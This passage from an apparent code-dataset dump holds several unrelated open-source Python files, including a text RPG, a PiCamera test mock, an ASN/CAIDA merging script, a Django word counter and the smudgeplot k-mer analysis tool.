","repo_name":"marinasguarino/Basic-Python","sub_path":"Python/Basic/09_loops.py","file_name":"09_loops.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11878918261","text":"from random import randint\r\nclass Character:\r\n def __init__(self, name, weapon, level):\r\n self.name = name\r\n self.weapon = weapon\r\n self.level = level\r\n self.hp = 30 + self.level * 20\r\n \r\n def attack(self, target):\r\n attack = self.weapon.attack()\r\n print(f\"{self.name} attacked {target.name} with a {self.weapon.name} for {attack} damage!\")\r\n target.hp -= attack\r\n \r\n def heal(self):\r\n self.hp += 10\r\n print(f\"{self.name} is healing...\")\r\n \r\n def is_alive(self):\r\n if self.hp <= 0:\r\n return False\r\n else:\r\n return True\r\n \r\n def __str__(self):\r\n return f\"{self.name}:\\nCurrent Weapon: {self.weapon}\\n\\tLevel: {self.level}\\n\"\r\n\r\nclass Weapon:\r\n def __init__(self, name, crit, ap):\r\n self.name = name\r\n self.crit = crit\r\n self.ap = ap\r\n \r\n # Calculates the damage that the weapon does for a character's attack\r\n def 
attack(self):\r\n ran_num = randint(1, 100)\r\n if ran_num <= self.crit:\r\n print(\"CRITICAL STRIKE!\")\r\n return randint(self.ap+1, self.ap*2)\r\n\r\n elif ran_num <= 1:\r\n print(f\"Your {self.name} glanced the foe!\")\r\n return randint(1, self.ap//2)\r\n else:\r\n return randint(self.ap//2, self.ap)\r\n\r\n def __str__(self):\r\n return f\"{self.name}\\n\\tDamage: {str(self.ap)}\\n\\tCritical Strike Chance: {str(self.crit)}%\"\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.hero_weapon = Weapon(\"Master Sword\", 25, 12)\r\n self.hero = Character(\"Link\", self.hero_weapon, 2)\r\n self.enemy_weapon = Weapon(\"Giant Club\", 35, 8)\r\n self.enemy = Character(\"Ganon\", self.enemy_weapon, 1)\r\n \r\n def play(self):\r\n i = 0\r\n while True:\r\n random_num = randint(1,100)\r\n i += 1\r\n print(f\"Round {i}...\")\r\n if random_num <= 50:\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\")\r\n turn = input(\"Would you like to (h)eal or (a)ttack?\\n> \")\r\n while True:\r\n if turn.lower() == \"attack\" or turn.lower() == \"a\":\r\n self.hero.attack(self.enemy)\r\n break\r\n elif turn == \"heal\" or turn == \"h\":\r\n self.hero.heal()\r\n break\r\n else:\r\n turn = input(\"That is not a valid input! Please enter one of the given options...\\n> \")\r\n\r\n if self.enemy.hp < 20:\r\n rand_num = randint(1,100)\r\n if rand_num <= 50:\r\n self.enemy.heal()\r\n else:\r\n self.enemy.attack(self.hero)\r\n else:\r\n self.enemy.attack(self.hero)\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\\n\")\r\n if self.hero.is_alive() == False:\r\n print(f\"{self.enemy.name} has killed {self.hero.name} with its {self.enemy.weapon.name}!\")\r\n break\r\n elif self.enemy.is_alive() == False:\r\n print(f\"{self.hero.name} has killed {self.enemy.name} with its {self.hero.weapon.name}!\")\r\n break\r\n input(\"Press enter when you are ready to continue!\")\r\n \r\n else:\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\")\r\n if self.enemy.hp < 20:\r\n rand_num = randint(1,100)\r\n if rand_num <= 50:\r\n self.enemy.heal()\r\n else:\r\n self.enemy.attack(self.hero)\r\n else:\r\n self.enemy.attack(self.hero)\r\n\r\n turn = input(\"Would you like to (h)eal or (a)ttack?\\n> \")\r\n while True:\r\n if turn.lower() == \"attack\" or turn.lower() == \"a\":\r\n self.hero.attack(self.enemy)\r\n break\r\n elif turn == \"heal\" or turn == \"h\":\r\n self.hero.heal()\r\n break\r\n else:\r\n turn = input(\"That is not a valid input! 
Please enter one of the given options...\\n> \")\r\n\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\\n\")\r\n if self.hero.is_alive() == False:\r\n print(f\"{self.enemy.name} has killed {self.hero.name} with its {self.enemy.weapon.name}!\")\r\n break\r\n elif self.enemy.is_alive() == False:\r\n print(f\"{self.hero.name} has killed {self.enemy.name} with its {self.hero.weapon.name}!\")\r\n break\r\n input(\"Press enter when you are ready to continue!\")\r\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\r\n\r\n \r\n\r\ndef main():\r\n game = Game()\r\n game.play()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Gameatron/python-things","sub_path":"CS1/Classes/my_rpg.py","file_name":"my_rpg.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20587421949","text":"__author__ = 'laurencoombe'\n\nclass Alignment:\n\n def __init__(self, score, correspondingVertices, indelVertices, q_edges, r_edges):\n self.score = score\n self.correspVertices = correspondingVertices\n self.indelVertices = indelVertices\n self.query_edges = q_edges\n self.ref_edges = r_edges\n\n","repo_name":"lcoombe/AutoBioGraphers","sub_path":"GraphMatch/Alignment.py","file_name":"Alignment.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40849685546","text":"import unittest.mock\nimport time\nimport io\nimport logging\nimport threading\nfrom PIL import Image as PILImage\nimport cv2\nimport numpy\n\nlogger = logging.getLogger()\n\nclass PiCameraMock(object):\n \"\"\"Implements PiCamera mock class\n PiCamera is the library used to access the integrated Camera, this mock class emulates the capture functions in order to test the streamer loop.\n \"\"\"\n\n def __init__(self):\n self.resolution = None\n self.framerate = None\n self.exposure_mode = None\n self.annotate_text = None\n self.splitter_recorders = {}\n self.images = {}\n i = open('test/test_image.jpeg', 'rb')\n image_jpeg = i.read()\n i.close()\n self.images[\"mjpeg\"] = image_jpeg \n self.images[\"bgra\"] = cv2.cvtColor(numpy.array(PILImage.open(io.BytesIO(image_jpeg))), cv2.COLOR_RGB2BGRA)\n \n\n class ImageRecorder(threading.Thread):\n def __init__(self, buffer, image):\n threading.Thread.__init__(self)\n self.buffer = buffer\n self.image = image\n self.go = True\n\n def run(self):\n while self.go:\n self.buffer.write(self.image)\n time.sleep(0.05)\n\n class VideoRecorder(object):\n def __init__(self, buffer, video):\n self.buffer = buffer\n self.video = video\n\n def start_recording(self, buffer, format, splitter_port, quality=None, bitrate=None, resize=None):\n \"\"\"mock start_recording\"\"\"\n print(format)\n if format == \"bgra\" and resize:\n self.images[format] = cv2.resize(self.images[format], resize)\n if format == \"h264\":\n f = open(\"test/test.h264\", \"rb\")\n video = f.read()\n f.close()\n self.splitter_recorders[splitter_port] = self.VideoRecorder(buffer, video)\n else:\n self.splitter_recorders[splitter_port] = self.ImageRecorder(buffer, self.images[format])\n self.splitter_recorders[splitter_port].start() \n\n def stop_recording(self, splitter_port):\n if splitter_port < 2:\n self.splitter_recorders[splitter_port].go = False\n self.splitter_recorders[splitter_port].join()\n else:\n recorder = self.splitter_recorders[splitter_port]\n f = open(recorder.buffer, \"wb\")\n
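            # For video splitter ports, stop_recording flushes the canned H.264 clip\n            # to the path that the test supplied as the recording buffer.\n            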
f.write(recorder.video)\n f.close()\n\n def close():\n \"\"\"mock close\"\"\"\n pass\n\n","repo_name":"CoderBotOrg/backend","sub_path":"test/picamera_mock.py","file_name":"picamera_mock.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"17568636784","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script deduplicates ASNs using the most common occurrence while\nmerging together routing data (RIPE) and ASN data (CAIDA).\n\nInputs:\n\n- from stdin we read a _sorted_ list of lines like ` `\nwhere the sort key is the netmask ascending\n\n- from caida_asn_to_name.dbm we read ASN->name mappings\n\nOutput:\n\n- to stdout ` ` where ``\nis the string `
    `\n\nExample input:\n\n 11.0.0.0 8 749\n 12.0.0.0 8 7018\n 17.0.0.0 8 714\n 21.0.0.0 8 749\n\nExample output:\n\n 11.0.0.0 8 749 DoD Network Information Center\n 12.0.0.0 8 7018 AT&T Services, Inc.\n 17.0.0.0 8 714 Apple Inc.\n 21.0.0.0 8 749 DoD Network Information Center\n\"\"\"\n\nimport dbm\nimport sys\nfrom collections import Counter\n\n\ndef main():\n asn_to_orgname = dbm.open(\"caida_asn_to_name.dbm\")\n\n c = Counter()\n current_net = None # \" \"\n for line in sys.stdin:\n net, asn = line.rstrip().rsplit(\" \", 1)\n if net != current_net:\n if current_net is not None:\n # Deduplicate ASNs using the most common occurrence\n oasn = c.most_common(1)[0][0]\n orgname = asn_to_orgname.get(oasn, b\"\").decode()\n print(f\"{current_net} {oasn} {orgname}\")\n c = Counter()\n current_net = net\n c.update([asn])\n\n # Deduplicate ASNs using the most common occurrence\n asn = c.most_common(1)[0][0]\n orgname = asn_to_orgname.get(asn, b\"\").decode()\n print(f\"{current_net} {asn} {orgname}\")\n\n asn_to_orgname.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ooni/asn-db-generator","sub_path":"dedupe_add_caida_orgname.py","file_name":"dedupe_add_caida_orgname.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"588124768","text":"# from django.http import HttpResponse\r\nfrom django.shortcuts import render\r\n\r\n\r\ndef home(request):\r\n return render(request, 'home.html')\r\n\r\n\r\ndef count(request):\r\n user_text = request.GET['text']\r\n total_count = len(user_text)\r\n\r\n word_dict = {}\r\n count_word = 0\r\n\r\n for c in user_text:\r\n if c not in word_dict:\r\n word_dict[c] = 1\r\n else:\r\n word_dict[c] += 1\r\n if c.isalnum():\r\n count_word += 1\r\n\r\n count_punctuation = total_count - count_word\r\n\r\n max_word = max(word_dict, key=lambda x: word_dict[x])\r\n max_value = max(word_dict, key=word_dict.get)\r\n max_word_value = max(word_dict.items(), key=lambda x:x[1])\r\n sorted_dict = sorted(word_dict.items(), key=lambda x:x[1], reverse=True)\r\n\r\n return render(request, 'count.html', {'total_count': total_count,\r\n 'user_text': user_text,\r\n 'word_dict': word_dict,\r\n 'max_word_value': max_word_value,\r\n 'sorted_dict': sorted_dict,\r\n 'count_word': count_word,\r\n 'count_punctuation': count_punctuation\r\n })\r\n\r\n\r\ndef about(request):\r\n return render(request, 'about.html')","repo_name":"liquidwang/Word_count_webapp","sub_path":"wordcount/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2450478839","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nfrom os import system\nfrom math import log\nfrom math import ceil\nimport numpy as np\nfrom scipy.signal import argrelextrema\n# hetkmers dependencies\nfrom collections import defaultdict\nfrom itertools import combinations\n\nversion = '0.2.5'\n\n############################\n# processing of user input #\n############################\n\nclass parser():\n def __init__(self):\n argparser = argparse.ArgumentParser(\n # description='Inference of ploidy and heterozygosity structure using whole genome sequencing data',\n usage='''smudgeplot [options] \\n\ntasks: cutoff Calculate meaningful values for lower/upper kmer histogram cutoff.\n hetkmers Calculate unique kmer pairs from a Jellyfish or KMC dump file.\n plot Generate 2d histogram; infere 
ploidy and plot a smudgeplot.\n extract Extract kmer pairs within specified coverage sum and minor covrage ratio ranges\\n\\n''')\n argparser.add_argument('task', help='Task to execute; for task specific options execute smudgeplot -h')\n argparser.add_argument('-v', '--version', action=\"store_true\", default = False, help=\"print the version and exit\")\n # print version is a special case\n if len(sys.argv) > 1:\n if sys.argv[1] in ['-v', '--version']:\n self.task = \"version\"\n return\n # the following line either prints help and die; or assign the name of task to variable task\n self.task = argparser.parse_args([sys.argv[1]]).task\n else:\n self.task = \"\"\n # if the task is known (i.e. defined in this file);\n if hasattr(self, self.task):\n # load arguments of that task\n getattr(self, self.task)()\n else:\n argparser.print_usage()\n sys.stderr.write('\"' + self.task + '\" is not a valid task name\\n')\n exit(1)\n\n def hetkmers(self):\n '''\n Calculate unique kmer pairs from a Jellyfish or KMC dump file.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot hetkmers',\n description='Calculate unique kmer pairs from a Jellyfish or KMC dump file.')\n argparser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin, help='Alphabetically sorted Jellyfish or KMC dump file (stdin).')\n argparser.add_argument('-o', help='The pattern used to name the output (kmerpairs).', default='kmerpairs')\n argparser.add_argument('--middle', dest='middle', action='store_const', const = True, default = False,\n help='Get all kmer pairs that are exactly the same but in the middle nt. When this flag is used, the input dump must be alphabetically sorted/ (default: different by a SNP at any position).')\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n def plot(self):\n '''\n Generate 2d histogram; infer ploidy and plot a smudgeplot.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot plot', description='Generate 2d histogram for smudgeplot')\n argparser.add_argument('infile', nargs='?', help='name of the input tsv file with covarages (default \\\"coverages_2.tsv\\\").\"')\n argparser.add_argument('-o', help='The pattern used to name the output (smudgeplot).', default='smudgeplot')\n argparser.add_argument('-q', help='Remove kmer pairs with coverage over the specified quantile; (default none).', type=float, default=1)\n argparser.add_argument('-L', help='The lower boundary used when dumping kmers (default min(total_pair_cov) / 2).', type=int, default=0)\n argparser.add_argument('-n', help='The expected haploid coverage (default estimated from data).', type=float, default=0)\n argparser.add_argument('-t', '--title', help='name printed at the top of the smudgeplot (default none).', default='')\n # argparser.add_argument('-m', '-method', help='The algorithm for annotation of smudges (default \\'local_aggregation\\')', default='local_aggregation')\n argparser.add_argument('-nbins', help='The number of nbins used for smudgeplot matrix (nbins x nbins) (default autodetection).', type=int, default=0)\n argparser.add_argument('-k', help='The length of the kmer.', default=21)\n # argparser.add_argument('-kmer_file', help='Name of the input files containing kmer seuqences (assuming the same order as in the coverage file)', default = \"\")\n argparser.add_argument('--homozygous', action=\"store_true\", default = False, help=\"Assume no heterozygosity in the genome - plotting a paralog structure; (default False).\")\n self.arguments = 
argparser.parse_args(sys.argv[2:])\n\n def cutoff(self):\n '''\n Calculate meaningful values for lower/upper kmer histogram cutoff.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot cutoff', description='Calculate meaningful values for lower/upper kmer histogram cutoff.')\n argparser.add_argument('infile', type=argparse.FileType('r'), help='Name of the input kmer histogram file (default \\\"kmer.hist\\\").\"')\n argparser.add_argument('boundary', help='Which bounary to compute L (lower) or U (upper)')\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n def extract(self):\n '''\n Extract kmer pairs within specified coverage sum and minor covrage ratio ranges.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot extract', description='Extract kmer pairs within specified coverage sum and minor covrage ratio ranges.')\n argparser.add_argument(\"-cov\", \"--coverageFile\",required=True, help=\"coverage file for the kmer pairs\")\n argparser.add_argument(\"-seq\", \"--seqFile\",required=True, help=\"sequences of the kmer pairs\")\n argparser.add_argument(\"-minc\", \"--countMin\",required=True, help=\"lower bound of the summed coverage\", type=int)\n argparser.add_argument(\"-maxc\", \"--countMax\",required=True, help=\"upper bound of the summed coverage\", type=int)\n argparser.add_argument(\"-minr\", \"--ratioMin\",required=True, help=\"lower bound of minor allele ratio\", type=float)\n argparser.add_argument(\"-maxr\", \"--ratioMax\",required=True, help=\"upper bound of minor allele ratio\", type=float)\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n###############\n# task cutoff #\n###############\n\ndef round_up_nice(x):\n digits = ceil(log(x, 10))\n if digits <= 1:\n multiplier = 10 ** (digits - 1)\n else:\n multiplier = 10 ** (digits - 2)\n return(ceil(x / multiplier) * multiplier)\n\ndef cutoff(args):\n # kmer_hist = open(\"data/Mflo2/kmer.hist\",\"r\")\n kmer_hist = args.infile\n hist = np.array([int(line.split()[1]) for line in kmer_hist])\n if args.boundary == \"L\":\n local_minima = argrelextrema(hist, np.less)[0][0]\n L = max(10, int(round(local_minima * 1.25)))\n sys.stdout.write(str(L))\n else:\n # take 99.8 quantile of kmers that are more than one in the read set\n hist_rel_cumsum = np.cumsum(hist[1:]) / np.sum(hist[1:])\n U = round_up_nice(np.argmax(hist_rel_cumsum > 0.998))\n sys.stdout.write(str(U))\n sys.stdout.flush()\n\n############\n# hetkmers #\n############\n\ndef get_one_away_pairs(kmer_index_family, k):\n \"\"\"kmer_index_family is a list of (kmer, index) pairs currently under consideration. k is the kmer length. get_one_away_pairs returns a list of pairs of indices where each pair of indices corresponds to a pair of kmers different in exactly one base.\"\"\"\n\n #This is the base case for the recursion. 
Return every pair of indices where the kmers corresponding to those indices differ at exactly one base.\n if k == 1:\n return [(i,j) for ((kmer1,i),(kmer2,j)) in combinations(kmer_index_family, 2) if kmer1 != kmer2]\n\n #Initialize one_away_pairs, which will be returned by get_one_away_pairs.\n one_away_pairs = []\n\n #Initialize dictionaries in which the key is a kmer_half (kmer_L or kmer_R) and the value is a list of (other_kmer_half, index) pairs.\n kmer_L_to_index_family = defaultdict(list)\n kmer_R_to_index_family = defaultdict(list)\n\n #Get the locations for the two halves of the kmer.\n k_L = k // 2\n k_R = k-k_L\n i_L_L = 0\n i_L_R = k_L - 1\n i_R_L = k_L\n i_R_R = k-1\n\n #For each kmer and index calculate the corresponding left half and right half, then add the necessary (kmer_half, index) pair to the corresponding entries of the dictionary\n for kmer, i in kmer_index_family:\n kmer_L = kmer[i_L_L:i_L_R+1]\n kmer_R = kmer[i_R_L:i_R_R+1]\n kmer_L_to_index_family[kmer_L].append((kmer_R, i))\n kmer_R_to_index_family[kmer_R].append((kmer_L, i))\n\n #For each left half in which there are multiple kmers with that left half, find the list of pairs in which the right half differs by 1. (aka, if left half matches, recurse on right half).\n for kmer_L_index_family in kmer_L_to_index_family.values(): #same in left half\n if len(kmer_L_index_family) > 1:\n one_away_pairs.extend(get_one_away_pairs(kmer_L_index_family, k_R)) #differ by 1 in right half\n\n del kmer_L_to_index_family\n\n #For each right half in which there are multiple kmers with that same right half, find the list of pairs in which the left half differs by 1. (aka, if right half matches, recurse on left half).\n for kmer_R_index_family in kmer_R_to_index_family.values(): #same in right half\n if len(kmer_R_index_family) > 1:\n one_away_pairs.extend(get_one_away_pairs(kmer_R_index_family, k_L)) #differ by 1 in left half\n\n del kmer_R_to_index_family\n return(one_away_pairs)\n\ndef middle_one_away(args):\n sys.stderr.write('Extracting kmer pairs that differ in the middle nt\\n')\n\n # file_one_away_pairs = open(args.o + '_one_away_pairs.tsv', 'w')\n file_coverages = open(args.o + '_coverages.tsv', 'w')\n file_kmers = open(args.o + '_sequences.tsv', 'w')\n\n duplicated = set()\n filtered = set()\n\n #Initialize a dictionary in which the key is the right kmer_half (not including the middle nucleotide), and the value is a list of (index, coverage) tuples corresponding to kmers that have that particular right kmer_half.\n kmer_R_to_index_family = defaultdict(list)\n\n # read the first line to get the length of the kmer\n with open(args.infile.name) as dump_file:\n kmer, coverage = dump_file.readline().split()\n k = len(kmer)\n\n #Get the locations for the two halves of the kmer.\n k_middle = k // 2\n i_L_L = 0\n i_L_R = k_middle - 1\n i_R_L = k_middle + 1\n i_R_R = k - 1\n\n sys.stderr.write('Saving ' + args.o + '_coverages.tsv and ' + args.o + '_sequences.tsv files.\\n')\n # Read each line of the input file in order to load the kmers and coverages and process the kmer halves.\n current_kmer_L = \"\"\n for i1, line in enumerate(args.infile):\n kmer, coverage1 = line.split()\n coverage1 = int(coverage1)\n\n new_kmer_L = kmer[i_L_L:i_L_R+1]\n kmer_R = kmer[i_R_L:i_R_R+1]\n if new_kmer_L == current_kmer_L:\n if kmer_R in kmer_R_to_index_family:\n if kmer_R in duplicated:\n filtered.discard(kmer_R)\n else:\n duplicated.add(kmer_R)\n filtered.add(kmer_R)\n else:\n for kmer_R in filtered:\n (i1, coverage1), (i2, coverage2) = 
kmer_R_to_index_family[kmer_R]\n if coverage2 < coverage1:\n file_coverages.write(str(coverage2) + '\\t' + str(coverage1) + '\\n')\n else:\n file_coverages.write(str(coverage1) + '\\t' + str(coverage2) + '\\n')\n file_kmers.write(current_kmer_L + 'N' + kmer_R + '\\n')\n duplicated = set()\n filtered = set()\n kmer_R_to_index_family = defaultdict(list)\n current_kmer_L = new_kmer_L\n kmer_R_to_index_family[kmer_R].append((i1,coverage1))\n\n file_coverages.close()\n file_kmers.close()\n\ndef all_one_away(args):\n #Initiate kmer and coverages lists.\n kmers = []\n coverages = []\n\n # Read each line of the input file in order to\n # load the kmers and coverages and process the kmer halves.\n for i, line in enumerate(args.infile):\n kmer, coverage = line.split()\n coverage = int(coverage)\n coverages.append(coverage)\n kmers.append(kmer)\n\n sys.stderr.write('Kmers and coverages loaded.\\n')\n\n k = len(kmer) # all the kmers in the dump file have the same length, so I can just calc the number of nts in the last one\n # get_one_away_pairs is a recursive function that gatheres indices of all kmer 1 SNP from each other\n one_away_pairs = get_one_away_pairs([(kmer,i) for i,kmer in enumerate(kmers)], k)\n\n sys.stderr.write('Kmer pairs identified.\\n')\n\n repeated = {}\n for (i1, i2) in one_away_pairs:\n repeated[i1] = i1 in repeated\n repeated[i2] = i2 in repeated\n\n sys.stderr.write('Kmers in unique kmer pairs identified.\\n')\n\n with open(args.o + '_sequences.tsv', 'w') as file_seqs, open(args.o + '_coverages.tsv', 'w') as file_coverages:\n for (i1, i2) in one_away_pairs:\n if not repeated[i1] and not repeated[i2]:\n cov1 = coverages[i1]\n cov2 = coverages[i2]\n if cov1 < cov2:\n file_coverages.write(str(cov1) + '\\t' + str(cov2) + '\\n')\n file_seqs.write(kmers[i1] + '\\t' + kmers[i2] + '\\n')\n else:\n file_coverages.write(str(cov2) + '\\t' + str(cov1) + '\\n')\n file_seqs.write(kmers[i2] + '\\t' + kmers[i1] + '\\n')\n\n sys.stderr.write(args.o + '_families.tsv and ' + args.o + '_coverages.tsv files saved.\\n')\n\ndef extract_kmer_pairs(args):\n index2covs = defaultdict(list)\n\n with open(args.coverageFile,\"r\") as f:\n for i, row in enumerate(f):\n row_list = row.rstrip(\"\\n\").split(\"\\t\")\n countL = int(row_list[0])\n countR = int(row_list[1])\n\n cov_sum = countL + countR\n cov_ratio = countL / (countL + countR)\n if cov_sum <= args.countMax and cov_sum >= args.countMin and cov_ratio >= args.ratioMin and cov_ratio <= args.ratioMax:\n # out_cov_h.write(str(countL)+\"\\t\" + str(countR) + \"\\n\")\n #print(str(i1))\n index2covs[i] = [countL, countR]\n\n with open(args.seqFile,\"r\") as f:\n extracted = 0\n for i, row in enumerate(f):\n if len(index2covs[i]) == 2:\n extracted += 1;\n kmer1, kmer2 = row.rstrip('\\n').split('\\t')\n sys.stdout.write(\">kmer_\" + str(i) + \"_1_cov_\" + str(index2covs[i][0]) + \"\\n\")\n sys.stdout.write(kmer1 + '\\n')\n sys.stdout.write(\">kmer_\" + str(i) + \"_2_cov_\" + str(index2covs[i][1]) + \"\\n\")\n sys.stdout.write(kmer2 + '\\n')\n sys.stderr.write(\"Extracting \" + str(extracted) + \" of total kmer pairs: \" + str(i + 1) + '\\n')\n sys.stderr.write(str(round(100 * extracted / (i + 1), 3)) + ' %\\n')\n\n#####################\n# the script itself #\n#####################\n\ndef main():\n _parser = parser()\n\n sys.stderr.write('Running smudgeplot v' + version + \"\\n\")\n if _parser.task == \"version\":\n exit(0)\n\n sys.stderr.write('Task: ' + _parser.task + \"\\n\")\n\n if _parser.task == \"cutoff\":\n cutoff(_parser.arguments)\n\n if 
_parser.task == \"hetkmers\":\n args = _parser.arguments\n if args.middle:\n middle_one_away(args)\n else:\n all_one_away(args)\n\n if _parser.task == \"plot\":\n # the plotting script is expected to be installed in the system as well as the R library supporting it\n args = _parser.arguments\n plot_args = \"-i \\\"\" + args.infile + \"\\\" -o \\\"\" + args.o + \"\\\" -k \" + str(args.k)\n if args.q != 1:\n plot_args += \" -q \" + str(args.q)\n if args.L != 0:\n plot_args += \" -L \" + str(args.L)\n if args.n != 0:\n plot_args += \" -n \" + str(args.n)\n if args.title:\n plot_args += \" -t \\\"\" + args.title + \"\\\"\"\n if args.nbins != 0:\n plot_args += \" -nbins \" + str(args.nbins)\n if args.homozygous:\n plot_args += \" --homozygous\"\n sys.stderr.write(\"Calling: smudgeplot_plot.R \" + plot_args + \"\\n\")\n system(\"smudgeplot_plot.R \" + plot_args)\n\n if _parser.task == \"extract\":\n extract_kmer_pairs(_parser.arguments)\n\n\n sys.stderr.write(\"\\nDone!\\n\")\n exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"KamilSJaron/smudgeplot","sub_path":"exec/smudgeplot.py","file_name":"smudgeplot.py","file_ext":"py","file_size_in_byte":16668,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"72"} +{"seq_id":"36546344507","text":"import logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef excelColumnName(number: int) -> str:\n \"\"\"\n\n :param number:\n :return:\n\n TC : O(Log 26 N)\n SC : O(1)\n \"\"\"\n\n # Max number of char in column name\n MAX = 50\n\n # Column name containing max characters\n string = ['\\0'] * MAX\n\n # Populate string\n index = 0\n while number > 0:\n\n remainder = number % 26\n\n logging.debug(\"Type of remainder is {} and its value is \\\"{}\\\" Also number is {}\".format(\n type(remainder), remainder, number\n ))\n\n if remainder == 0:\n string[index] = 'Z'\n number = number // 26 - 1\n else:\n string[index] = chr((remainder - 1) + ord('A'))\n number = number // 26\n\n index += 1\n\n # # Reverse string\n # start = 0\n # end = index\n # while start < end:\n # string[start], string[end] = string[end], string[start]\n # start += 1\n # end -= 1\n\n string = string[::-1]\n\n return \"\".join(string[-index:])\n\n\nif __name__ == '__main__':\n number = 80\n print(\"1. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n\n number = 676\n print(\"2. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n number = 702\n print(\"3. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n number = 708\n print(\"4. 
For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/String/11Findexcelcolumnnamefromagivencolumnnumber.py","file_name":"11Findexcelcolumnnamefromagivencolumnnumber.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40438739719","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Date: 2016-12-10 23:57:46\n# @Last Modified by: Lich_Amnesia\n# @Last Modified time: 2016-12-10 23:57:46\n# @Email: shen.huang@colorado.edu\n\nclass Solution(object):\n def validWordSquare(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: bool\n \"\"\"\n n = len(words)\n m = len(words[0]) if n else 0\n if n != m:\n return False\n for x in range(n):\n len_s = len(words[x])\n c = 0\n for y in range(n):\n if len(words[y]) < x + 1:\n break\n c += 1\n if c != len_s:\n return False\n for y in range(len_s):\n if words[x][y] != words[y][x]:\n return False\n return True","repo_name":"LichAmnesia/LeetCode","sub_path":"python/422.py","file_name":"422.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72367167592","text":"class School(object):\n def __init__(self, student_list):\n self.students = student_list\n\n def __getitem__(self, item):\n return self.students[item]\n\n\nstudent_list = ['a', 's', 'f', 't']\n\nstudents = School(student_list)\n# 定义了getitem方法,可以实现index索引取值\nprint(students[2])\n\n# for循环时,当找不到__iter__方法时,会查\n# 找__getitem__方法,有就可以实现循环取值\nfor student in students:\n print(student)\n","repo_name":"CuteSmartTiger/keeplearning","sub_path":"fluent Python/magic method/getitem.py","file_name":"getitem.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"33440844508","text":"from .imports import *\nfrom .utils import *\n\n__all__ = ['TensorList', 'tensor_lists_from_arrays']\n\nclass TensorItem(ItemBase):\n \"`ItemBase` suitable for Tensors\"\n\n def __init__(self, item):\n super().__init__(item)\n self.channels = item.shape[-2]\n self.seq_len = item.shape[-1]\n\n\n def __str__(self):\n return 'TensorItem(ch={:.0f}, seq_len={:.0f})'.format(\n self.channels, self.seq_len)\n\n def clone(self):\n return self.__class__(self.data.clone())\n\n def apply_tfms(self, tfms, **kwargs):\n x = self.clone()\n for tfm in tfms:\n x.data = tfm(x.data)\n return x\n\n def reconstruct(self, item):\n return TensorItem(item)\n\n def show(self, ax=None, title=None, **kwargs):\n if ax is None:\n plt.plot(*self.data)\n plt.show()\n else:\n ax.plot(*self.data)\n ax.title.set_text(title)\n ax.tick_params(\n axis='both',\n which='both',\n bottom='off',\n top='off',\n labelbottom='off',\n right='off',\n left='off',\n labelleft='off')\n return ax\n\nclass TensorPreProc(PreProcessor):\n\n def __init__(self, ds: ItemList): self.ds = ds\n\n def process(self, ds: ItemList):\n ds.features, ds.seq_len = self.ds.get(0).data.size(-2), self.ds.get(0).data.size(-1)\n\n\nclass TensorList(ItemList):\n \"`ItemList` suitable for Tensor\"\n _processor = TensorPreProc\n _label_cls = None\n _square_show = True\n\n def __init__(self, items, *args, mask=None, tfms=None, **kwargs):\n items = to3dtensor(items)\n super().__init__(items, *args, **kwargs)\n self.tfms,self.mask = tfms,mask\n 
